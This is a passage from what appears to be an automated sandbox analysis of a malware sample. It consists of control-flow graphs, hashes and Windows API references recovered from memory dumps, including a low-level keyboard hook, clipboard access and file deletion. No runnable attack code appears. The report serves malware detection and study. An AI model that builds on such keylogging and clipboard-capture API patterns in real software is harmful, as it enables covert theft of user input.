686b1b3-686b28e call 68666b0 80->85 84->54 85->84 92 686af8d-686af8f 87->92 93 686af8b 87->93 97 686afc2-686aff3 88->97 98 686afac-686afb2 88->98 92->88 93->88 97->50 99 686afb6-686afb8 98->99 100 686afb4 98->100 99->97 100->97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-3823777903
                                                    • Opcode ID: f18cd797b99562e3accaf6cceb13626083f7cd3ac4385627f2a4c0370275a11b
                                                    • Instruction ID: 44e85748a1f9d1f64bf108856c42895896394ded0505ceb05e29f95ff87b8006
                                                    • Opcode Fuzzy Hash: f18cd797b99562e3accaf6cceb13626083f7cd3ac4385627f2a4c0370275a11b
                                                    • Instruction Fuzzy Hash: 16E17C30E1020A8FDB69DF6AD9846AEB7F2EF84304F108529E519EB354DB71D846CB81
                                                    Function 06869260 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 790 6869260-6869285 791 6869287-686928a 790->791 792 68692b0-68692b3 791->792 793 686928c-68692ab 791->793 794 6869b73-6869b75 792->794 795 68692b9-68692ce 792->795 793->792 797 6869b77 794->797 798 6869b7c-6869b7f 794->798 802 68692e6-68692fc 795->802 803 68692d0-68692d6 795->803 797->798 798->791 800 6869b85-6869b8f 798->800 807 6869307-6869309 802->807 804 68692da-68692dc 803->804 805 68692d8 803->805 804->802 805->802 808 6869321-6869392 807->808 809 686930b-6869311 807->809 820 6869394-68693b7 808->820 821 68693be-68693da 808->821 810 6869315-6869317 809->810 811 6869313 809->811 810->808 811->808 820->821 826 6869406-6869421 821->826 827 68693dc-68693ff 821->827 832 6869423-6869445 826->832 833 686944c-6869467 826->833 827->826 832->833 838 6869492-686949c 833->838 839 6869469-686948b 833->839 840 686949e-68694a7 838->840 841 68694ac-6869526 838->841 839->838 840->800 847 6869573-6869588 841->847 848 6869528-6869546 841->848 847->794 852 6869562-6869571 848->852 853 6869548-6869557 848->853 852->847 852->848 853->852
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q
                                                    • API String ID: 0-2125118731
                                                    • Opcode ID: df891140c9244d5b8bc7fb40d0b3d9962114a32618df422e4c9a70e153edab69
                                                    • Instruction ID: 52c1e89546c4439337b40cfc55e63b75fe6c1fca52120c66a9afa5ed3b470fea
                                                    • Opcode Fuzzy Hash: df891140c9244d5b8bc7fb40d0b3d9962114a32618df422e4c9a70e153edab69
                                                    • Instruction Fuzzy Hash: FD915C30B0021A8FDF64DF65D9507AEB3F6AFC9204F10856AD509EB388EA70DD46CB95
                                                    Function 0686D068 Relevance: 4.5, Strings: 3, Instructions: 798COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 856 686d068-686d083 857 686d085-686d088 856->857 858 686d0d1-686d0d4 857->858 859 686d08a-686d099 857->859 862 686d0d6-686d118 858->862 863 686d11d-686d120 858->863 860 686d09b-686d0a0 859->860 861 686d0a8-686d0b4 859->861 860->861 864 686da85-686dabe 861->864 865 686d0ba-686d0cc 861->865 862->863 866 686d122-686d124 863->866 867 686d12f-686d132 863->867 882 686dac0-686dac3 864->882 865->858 868 686d551 866->868 869 686d12a 866->869 870 686d134-686d139 867->870 871 686d13c-686d13f 867->871 873 686d554-686d560 868->873 869->867 870->871 875 686d141-686d183 871->875 876 686d188-686d18b 871->876 873->859 878 686d566-686d853 873->878 875->876 879 686d1d4-686d1d7 876->879 880 686d18d-686d1cf 876->880 1069 686da7a-686da84 878->1069 1070 686d859-686d85f 878->1070 883 686d220-686d223 879->883 884 686d1d9-686d21b 879->884 880->879 886 686dae6-686dae9 882->886 887 686dac5-686dae1 882->887 892 686d225-686d267 883->892 893 686d26c-686d26f 883->893 884->883 889 686db1c-686db1f 886->889 890 686daeb-686db17 886->890 887->886 897 686db21 889->897 898 686db2e-686db30 889->898 890->889 892->893 899 686d271-686d280 893->899 900 686d2b8-686d2bb 893->900 1116 686db21 call 686dbf0 897->1116 1117 686db21 call 686dbdd 897->1117 908 686db37-686db3a 898->908 909 686db32 898->909 910 686d282-686d287 899->910 911 686d28f-686d29b 899->911 904 686d2bd-686d2bf 900->904 905 686d2ca-686d2cd 900->905 912 686d2c5 904->912 913 686d40f-686d418 904->913 914 686d2cf-686d2e5 905->914 915 686d2ea-686d2ed 905->915 908->882 920 686db3c-686db4b 908->920 909->908 910->911 911->864 921 686d2a1-686d2b3 911->921 912->905 927 686d427-686d433 913->927 928 686d41a-686d41f 913->928 914->915 924 686d336-686d339 915->924 925 686d2ef-686d331 915->925 919 686db27-686db29 919->898 939 686dbb2-686dbc7 920->939 940 686db4d-686dbb0 call 68666b0 920->940 921->900 934 686d35c-686d35f 924->934 935 686d33b-686d357 924->935 925->924 936 686d544-686d549 927->936 937 686d439-686d44d 927->937 928->927 934->873 944 686d365-686d368 934->944 935->934 936->868 937->868 962 686d453-686d465 937->962 966 686dbc8 939->966 940->939 952 686d3b1-686d3b4 944->952 953 686d36a-686d3ac 944->953 957 686d3b6-686d3f8 952->957 958 686d3fd-686d3ff 952->958 953->952 957->958 967 686d406-686d409 958->967 968 686d401 958->968 977 686d467-686d46d 962->977 978 686d489-686d48b 962->978 966->966 967->857 967->913 968->967 979 686d471-686d47d 977->979 980 686d46f 977->980 983 686d495-686d4a1 978->983 987 686d47f-686d487 979->987 980->987 996 686d4a3-686d4ad 983->996 997 686d4af 983->997 987->983 999 686d4b4-686d4b6 996->999 997->999 999->868 1003 686d4bc-686d4d8 call 68666b0 999->1003 1013 686d4e7-686d4f3 1003->1013 1014 686d4da-686d4df 1003->1014 1013->936 1016 686d4f5-686d542 1013->1016 1014->1013 1016->868 1071 686d861-686d866 1070->1071 1072 686d86e-686d877 1070->1072 1071->1072 1072->864 1073 686d87d-686d890 1072->1073 1075 686d896-686d89c 1073->1075 1076 686da6a-686da74 1073->1076 1077 686d89e-686d8a3 1075->1077 1078 686d8ab-686d8b4 1075->1078 1076->1069 1076->1070 1077->1078 1078->864 1079 686d8ba-686d8db 1078->1079 1082 686d8dd-686d8e2 1079->1082 1083 686d8ea-686d8f3 1079->1083 1082->1083 1083->864 1084 686d8f9-686d916 1083->1084 1084->1076 1087 686d91c-686d922 1084->1087 1087->864 1088 686d928-686d941 1087->1088 1090 686d947-686d96e 1088->1090 1091 686da5d-686da64 1088->1091 1090->864 1094 686d974-686d97e 1090->1094 1091->1076 1091->1087 1094->864 1095 686d984-686d99b 1094->1095 1097 686d99d-686d9a8 1095->1097 1098 686d9aa-686d9c5 1095->1098 1097->1098 1098->1091 1103 686d9cb-686d9e4 call 68666b0 1098->1103 1107 686d9e6-686d9eb 1103->1107 1108 686d9f3-686d9fc 1103->1108 1107->1108 1108->864 1109 686da02-686da56 1108->1109 1109->1091 1116->919 1117->919
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q
                                                    • API String ID: 0-831282457
                                                    • Opcode ID: 29d4cf8f99efdfe039866f3ac4908511e83f0e3c929487619e9260c409f29158
                                                    • Instruction ID: 8cd9ae3bc2eb0f499e6e05883ed12e8f0c73e73267bf2ed63bc276e027edad14
                                                    • Opcode Fuzzy Hash: 29d4cf8f99efdfe039866f3ac4908511e83f0e3c929487619e9260c409f29158
                                                    • Instruction Fuzzy Hash: 8C622E30B002098FCB55EB69D690A5EB7B2FF84304F248A69D419DF758DB71ED86CB81
                                                    Function 06864C78 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1118 6864c78-6864c9c 1119 6864c9e-6864ca1 1118->1119 1120 6864cc2-6864cc5 1119->1120 1121 6864ca3-6864cbd 1119->1121 1122 68653a4-68653a6 1120->1122 1123 6864ccb-6864dc3 1120->1123 1121->1120 1124 68653ad-68653b0 1122->1124 1125 68653a8 1122->1125 1141 6864e46-6864e4d 1123->1141 1142 6864dc9-6864e11 1123->1142 1124->1119 1127 68653b6-68653c3 1124->1127 1125->1124 1143 6864e53-6864ec3 1141->1143 1144 6864ed1-6864eda 1141->1144 1164 6864e16 call 6865522 1142->1164 1165 6864e16 call 6865530 1142->1165 1161 6864ec5 1143->1161 1162 6864ece 1143->1162 1144->1127 1155 6864e1c-6864e38 1158 6864e43-6864e44 1155->1158 1159 6864e3a 1155->1159 1158->1141 1159->1158 1161->1162 1162->1144 1164->1155 1165->1155
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fcq$XPcq$\Ocq
                                                    • API String ID: 0-3575482020
                                                    • Opcode ID: 0ee5f9f3da8cbd6778399e7469c7286bc5f614dc768dd0d2dcd5f2fe313a9e38
                                                    • Instruction ID: 122bb4efeedd5ec5caf7b381009d1c69d330986b908dd73675ce66c3e247a90c
                                                    • Opcode Fuzzy Hash: 0ee5f9f3da8cbd6778399e7469c7286bc5f614dc768dd0d2dcd5f2fe313a9e38
                                                    • Instruction Fuzzy Hash: 81618030F002089FEB549FA5C8547AEBBF3EB88710F20842AE505EB394DF758D458B91
                                                    Function 06869252 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2490 6869252-6869285 2492 6869287-686928a 2490->2492 2493 68692b0-68692b3 2492->2493 2494 686928c-68692ab 2492->2494 2495 6869b73-6869b75 2493->2495 2496 68692b9-68692ce 2493->2496 2494->2493 2498 6869b77 2495->2498 2499 6869b7c-6869b7f 2495->2499 2503 68692e6-68692fc 2496->2503 2504 68692d0-68692d6 2496->2504 2498->2499 2499->2492 2501 6869b85-6869b8f 2499->2501 2508 6869307-6869309 2503->2508 2505 68692da-68692dc 2504->2505 2506 68692d8 2504->2506 2505->2503 2506->2503 2509 6869321-6869392 2508->2509 2510 686930b-6869311 2508->2510 2521 6869394-68693b7 2509->2521 2522 68693be-68693da 2509->2522 2511 6869315-6869317 2510->2511 2512 6869313 2510->2512 2511->2509 2512->2509 2521->2522 2527 6869406-6869421 2522->2527 2528 68693dc-68693ff 2522->2528 2533 6869423-6869445 2527->2533 2534 686944c-6869467 2527->2534 2528->2527 2533->2534 2539 6869492-686949c 2534->2539 2540 6869469-686948b 2534->2540 2541 686949e-68694a7 2539->2541 2542 68694ac-6869526 2539->2542 2540->2539 2541->2501 2548 6869573-6869588 2542->2548 2549 6869528-6869546 2542->2549 2548->2495 2553 6869562-6869571 2549->2553 2554 6869548-6869557 2549->2554 2553->2548 2553->2549 2554->2553
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q
                                                    • API String ID: 0-355816377
                                                    • Opcode ID: a312f92da9f03b77b499ae41c6f93732455bb56d564d1b6f1707a13d5929a367
                                                    • Instruction ID: 4d2688826414c9a531226f6f0c50bf1ad7740f2bd62e537b6e4b56f811f70190
                                                    • Opcode Fuzzy Hash: a312f92da9f03b77b499ae41c6f93732455bb56d564d1b6f1707a13d5929a367
                                                    • Instruction Fuzzy Hash: 52512F30B001069FDF54EF69DA90B6EB3F6EBC8604F10856AD509DB788EA70DC42CB95
                                                    Function 06864C69 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2557 6864c69-6864c9c 2558 6864c9e-6864ca1 2557->2558 2559 6864cc2-6864cc5 2558->2559 2560 6864ca3-6864cbd 2558->2560 2561 68653a4-68653a6 2559->2561 2562 6864ccb-6864dc3 2559->2562 2560->2559 2563 68653ad-68653b0 2561->2563 2564 68653a8 2561->2564 2580 6864e46-6864e4d 2562->2580 2581 6864dc9-6864e11 2562->2581 2563->2558 2566 68653b6-68653c3 2563->2566 2564->2563 2582 6864e53-6864ec3 2580->2582 2583 6864ed1-6864eda 2580->2583 2603 6864e16 call 6865522 2581->2603 2604 6864e16 call 6865530 2581->2604 2600 6864ec5 2582->2600 2601 6864ece 2582->2601 2583->2566 2594 6864e1c-6864e38 2597 6864e43-6864e44 2594->2597 2598 6864e3a 2594->2598 2597->2580 2598->2597 2600->2601 2601->2583 2603->2594 2604->2594
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fcq$XPcq
                                                    • API String ID: 0-936005338
                                                    • Opcode ID: 0ee992e80dd8649eeb8ee4db5078a73a1312e4019fbcaf07a3dc04f00ccd1a6d
                                                    • Instruction ID: b3c4a2a0debb0abb88c44740daefba85b96a41945bc05b4d99ac622f293deca6
                                                    • Opcode Fuzzy Hash: 0ee992e80dd8649eeb8ee4db5078a73a1312e4019fbcaf07a3dc04f00ccd1a6d
                                                    • Instruction Fuzzy Hash: 25517D30F102089FEB55DFA5C8547AEBBF7AF88710F20892AE105EB395DE758D018B91
                                                    Function 0297EEA0 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2885 297eea0-297eeab 2886 297eed5-297eeeb 2885->2886 2887 297eead-297eed4 2885->2887 2906 297eeed call 297ee90 2886->2906 2907 297eeed call 297eea0 2886->2907 2908 297eeed call 297ef30 2886->2908 2909 297eeed call 297ef70 2886->2909 2890 297eef2-297eef4 2891 297eef6-297eef9 2890->2891 2892 297eefa-297ef59 2890->2892 2898 297ef5f-297efec GlobalMemoryStatusEx 2892->2898 2899 297ef5b-297ef5e 2892->2899 2902 297eff5-297f01d 2898->2902 2903 297efee-297eff4 2898->2903 2903->2902 2906->2890 2907->2890 2908->2890 2909->2890
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4171265813.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_2970000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 92783db996d7ac5425ad4e2744b5b2d6cb98027a06f9f81ddffd94dba2f86457
                                                    • Instruction ID: 6a93af4e03b3f42ab08aa5cc7ccde90010831a6001a70970dfe867420ffc0816
                                                    • Opcode Fuzzy Hash: 92783db996d7ac5425ad4e2744b5b2d6cb98027a06f9f81ddffd94dba2f86457
                                                    • Instruction Fuzzy Hash: 89413472D047558FDB04DF69D80429EBBF1EF89310F1486AAE448E7250DB74A841CBD0
                                                    Function 06855FD3 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068560EA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 8b1ea2a596a857ed2407a9266791e55856aa8530898a4a078782863331b2136d
                                                    • Instruction ID: 9f9dc044d1380cbc5d17b6df09a45e03e2d83072765ab8be47d9d8bf3820a68c
                                                    • Opcode Fuzzy Hash: 8b1ea2a596a857ed2407a9266791e55856aa8530898a4a078782863331b2136d
                                                    • Instruction Fuzzy Hash: 7251D0B1D00309DFDB54CF9AC884ADEBBB5BF48314F65812AE819AB220D7719885CF91
                                                    Function 06855FD8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068560EA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: f85b20dc08d378aa666d7eebe2ad1340d68703abf3656e2fd72532f16f491312
                                                    • Instruction ID: 83793f2547e6fe389550397fa87b2d0ab0eebd9d9556241d32588c1cef6effd1
                                                    • Opcode Fuzzy Hash: f85b20dc08d378aa666d7eebe2ad1340d68703abf3656e2fd72532f16f491312
                                                    • Instruction Fuzzy Hash: 9741C0B1D00309DFDB54CF9AC884ADEBBB5BF48314F65812AE819AB220D7759885CF90
                                                    Function 06859AB4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0685AE29
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: f56202f54c1766ce951cf04534f7abbd8c3421623b5d1cad53fd55df1d262a03
                                                    • Instruction ID: 63afbaf3ce6c6ee4fee115763a73859227b4ae5e569497b2e10f871c6c01a0f8
                                                    • Opcode Fuzzy Hash: f56202f54c1766ce951cf04534f7abbd8c3421623b5d1cad53fd55df1d262a03
                                                    • Instruction Fuzzy Hash: FD4129B49003498FDB54CF99C488AAEBBF5FF88314F15C559D919AB321D774A844CFA0
                                                    Function 0685B4D0 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Clipboard
                                                    • String ID:
                                                    • API String ID: 220874293-0
                                                    • Opcode ID: 55d12e40997f5fba27a613281daea2239e51146cf9f43c40f37b406c29b8164c
                                                    • Instruction ID: fafbc6d3859a3a258f7c85b5fe243dcab87c6f0db152f9cba4fe795bb69b216a
                                                    • Opcode Fuzzy Hash: 55d12e40997f5fba27a613281daea2239e51146cf9f43c40f37b406c29b8164c
                                                    • Instruction Fuzzy Hash: F13102B0D01208DFDB50DF99C994BDEBBF5AF48304F208019E904BB294D7B5A845CF95
                                                    Function 0685BAA5 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: Clipboard
                                                    • String ID:
                                                    • API String ID: 220874293-0
                                                    • Opcode ID: 2341b2c25c0999f08d620f0ff85bc76447ccea6a83868a170ae950f5748b3fa0
                                                    • Instruction ID: b35946b763c15cc90325edf6edc667de8ad4d2c837fab2815059b6763f691941
                                                    • Opcode Fuzzy Hash: 2341b2c25c0999f08d620f0ff85bc76447ccea6a83868a170ae950f5748b3fa0
                                                    • Instruction Fuzzy Hash: D13101B0D01248EFDB50DF99C994BCEBBF5AF48304F248019E504BB394D7B56945CBA6
                                                    Function 0685D6A9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0685D458,00000000,00000000), ref: 0685D66B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: 59d94398ab5d56c2003ff433761bd03206190f742a4738d0df524d961b428636
                                                    • Instruction ID: 2f1dddac1c3802f6d9c7ddc7bebdfa3f39f2bcc65f807ab59a9776c24a51a37c
                                                    • Opcode Fuzzy Hash: 59d94398ab5d56c2003ff433761bd03206190f742a4738d0df524d961b428636
                                                    • Instruction Fuzzy Hash: BB2103719043048FC790DB69C8406AEFBF1EF85314F11886EC56DD7250CB35A94ACF95
                                                    Function 06859ED8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06859F5F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: fc3ba45777754dbf7a0d2ca6b88373a21d169b368185972f785bf010a5f89a2a
                                                    • Instruction ID: 2212071eb9c990281fe14e6bb26bc239ac746818c1b18cbea522c68efb23a8a1
                                                    • Opcode Fuzzy Hash: fc3ba45777754dbf7a0d2ca6b88373a21d169b368185972f785bf010a5f89a2a
                                                    • Instruction Fuzzy Hash: 4E21E4B5D00248DFDB10CFAAD984ADEBFF8EB48310F14801AE918A3310D374A944CFA4
                                                    Function 06859ED0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06859F5F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 3a1419670db95d075ccb47e2beba24bac847712dee9fdaad0d0eb33a74ca4008
                                                    • Instruction ID: 39e2efb5d5e043dd009a9ec9cb593ec5d7ca6f11ad04b157bdba72338289e683
                                                    • Opcode Fuzzy Hash: 3a1419670db95d075ccb47e2beba24bac847712dee9fdaad0d0eb33a74ca4008
                                                    • Instruction Fuzzy Hash: 9A21E0B5900248DFDB10CFA9D984AEEBFF8EB48314F14841AE959A3250D378A944CFA0
                                                    Function 02978038 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNEL32(00000000), ref: 029780B0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4171265813.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_2970000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: b814a00b2a714337cf68e616928ef147180e3a708b4ecb9cf68eabe596419d5f
                                                    • Instruction ID: 9ffbe3272645efcac1509d8b89f021e7b88d34beb7af0f3c7eecae8c31fe93f2
                                                    • Opcode Fuzzy Hash: b814a00b2a714337cf68e616928ef147180e3a708b4ecb9cf68eabe596419d5f
                                                    • Instruction Fuzzy Hash: CC2135B1C006599BCB20CFAAD445AEEFBB4BB48320F10822AD858A7350D335A944CFA0
                                                    Function 0685D5E8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0685D458,00000000,00000000), ref: 0685D66B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: f554ffac858ec8b38296ff6c6ed1496ef75a7e110436386bd68ad5f9abaef40b
                                                    • Instruction ID: 60067ed7d1ddb58c0de4436b811431a6c82fb4088fb5de27b61af2d2df38e469
                                                    • Opcode Fuzzy Hash: f554ffac858ec8b38296ff6c6ed1496ef75a7e110436386bd68ad5f9abaef40b
                                                    • Instruction Fuzzy Hash: 0B2147B5D002099FCB54CFAAC844BEEFBF5EF88310F108429E959A7250C774A945CFA5
                                                    Function 0685B098 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0685B075), ref: 0685B0FF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4188863681.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6850000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherUser
                                                    • String ID:
                                                    • API String ID: 2492992576-0
                                                    • Opcode ID: 6f5e1b2c2104d01706a24d87e4e8d4506970f06ef71e94444da8695621265584
                                                    • Instruction ID: d188f21711443f87c84f3f15c96370d0d7a192e6fa4e0fa09b91dfc417b3a56c
                                                    • Opcode Fuzzy Hash: 6f5e1b2c2104d01706a24d87e4e8d4506970f06ef71e94444da8695621265584
                                                    • Instruction Fuzzy Hash: 811126B5D002488FCB60DF9AD885BDEFBF4EB49324F20846AE919A7240D375A544CFA5
                                                    Function 02978040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNEL32(00000000), ref: 029780B0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4171265813.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_2970000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: e1d8b0b042c2decc377042dfbc3beac9849d53849e96cd685d21403458251d74
                                                    • Instruction ID: 441fe5ff2007650935bbc97f02dfa76056b2de36a2be96a325452ab479073225
                                                    • Opcode Fuzzy Hash: e1d8b0b042c2decc377042dfbc3beac9849d53849e96cd685d21403458251d74
                                                    • Instruction Fuzzy Hash: 471136B1C006599BCB10CFAAC544BDEFBF4BB48324F11822AD858B7240D378A944CFA5
                                                    Function 0297EF70 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0297EFDF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4171265813.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_2970000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemoryStatus
                                                    • String ID:
                                                    • API String ID: 1890195054-0
